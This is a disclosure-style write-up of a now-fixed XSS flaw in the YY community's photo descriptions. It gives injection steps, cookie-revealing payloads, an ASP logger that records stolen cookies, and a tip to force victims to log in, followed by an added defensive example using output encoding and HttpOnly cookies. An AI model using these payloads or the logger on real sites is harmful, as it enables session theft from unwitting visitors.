Attackers can exploit an XSS vulnerability in the YY community to obtain and store user cookies.

Author: B0mbErM@n

The vulnerability was submitted to the official website a few days ago and has been fixed. For more information, see the figure below.

-
Introduction:
The XSS is carried out through the album function of the YY community [m.yy.com].
This method is used in many places to obtain and store visitors' valid cookies.
-
Verify XSS:
Log on to [m.yy.com] and apply for a contract. After applying, you have your own YY space.
Open the album > upload a photo > open the photo after upload > edit the description > insert the XSS statement.
The most basic XSS statement: <script>alert(/B0mbErM@n/)</script>
If the verification passes, a dialog box showing /B0mbErM@n/ is displayed, and we can perform the next verification.


-
Deeper XSS verification:
Change the statement to <script>alert(document.cookie)</script>.
The cookie value displayed in this pop-up window contains the username, password, and other information.


-
Use XSS to store cookies:
Insert the XSS statement <script>document.write();</script>
Here B0mberM@n.asp is a file and website is a web site. We need to put the ASP file on an accessible website. When the XSS page is accessed, the ASP program is executed and no prompt box is displayed, so it stays hidden.
-
B0mberM@n.asp program code:
<%
' Take the raw query string of the incoming request
Msg = Request.ServerVariables("QUERY_STRING")
' Resolve the log file path in the program directory
Testfile = Server.MapPath("B0mberM@n.txt")
Set fs = Server.CreateObject("Scripting.FileSystemObject")
' Open for appending (8), create the file if missing, ASCII format (0)
Set thisfile = fs.OpenTextFile(Testfile, 8, True, 0)
thisfile.WriteLine("" & Msg & "")
thisfile.Close
Set thisfile = Nothing
Set fs = Nothing
%>
Note: The recorded msg will be stored in the b0mberm@n.txt file in the program directory.
-
Further expansion:
Of course, a user may visit our XSS page without being logged in. To make them log in first, we can add an automatic redirect to the login page at the end of B0mbErM@n.asp; the other party will subconsciously log in and open the page containing the XSS statement again, and then we get the visitor's cookie. (There is a lot of automatic redirect code for ASP, so we will not give an example here. You can find more, better, and more detailed code on Google.)
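
Both test statements above work only because the photo description is rendered unescaped and the login cookie is readable from script. The following is an added example, not code from the original article and not the vendor's actual fix (which the page does not describe): it shows output encoding of the description and an HttpOnly session cookie. All function names, the cookie name and the token value are assumptions made for illustration.

```javascript
// Added example: hypothetical server-side helpers, not YY's code.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode user-supplied text for an HTML element or quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a photo description (hypothetical template) with output encoding.
function renderDescription(description) {
  return '<p class="photo-desc">' + escapeHtml(description) + '</p>';
}

// Build a Set-Cookie header value; HttpOnly keeps it out of document.cookie.
function sessionCookieHeader(name, value) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  return name + '=' + encodeURIComponent(value) + '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Model of what page script can read: browsers omit HttpOnly cookies.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*httponly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Constructed sample input: the two test statements from the article.
const SAMPLES = [
  '<script>alert(/B0mbErM@n/)</script>',
  '<script>alert(document.cookie)</script>',
];

function demo() {
  const rendered = SAMPLES.map(renderDescription);
  const headers = [
    sessionCookieHeader('session', 'constructed-token-123'), // constructed value
    'theme=dark; Path=/', // non-sensitive preference, still script-readable
  ];
  return { rendered, visible: scriptVisibleCookies(headers) };
}

console.log(demo());
```

With encoding applied, the description is displayed as literal text instead of running, and even if a script did run, the session cookie would not appear in document.cookie.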
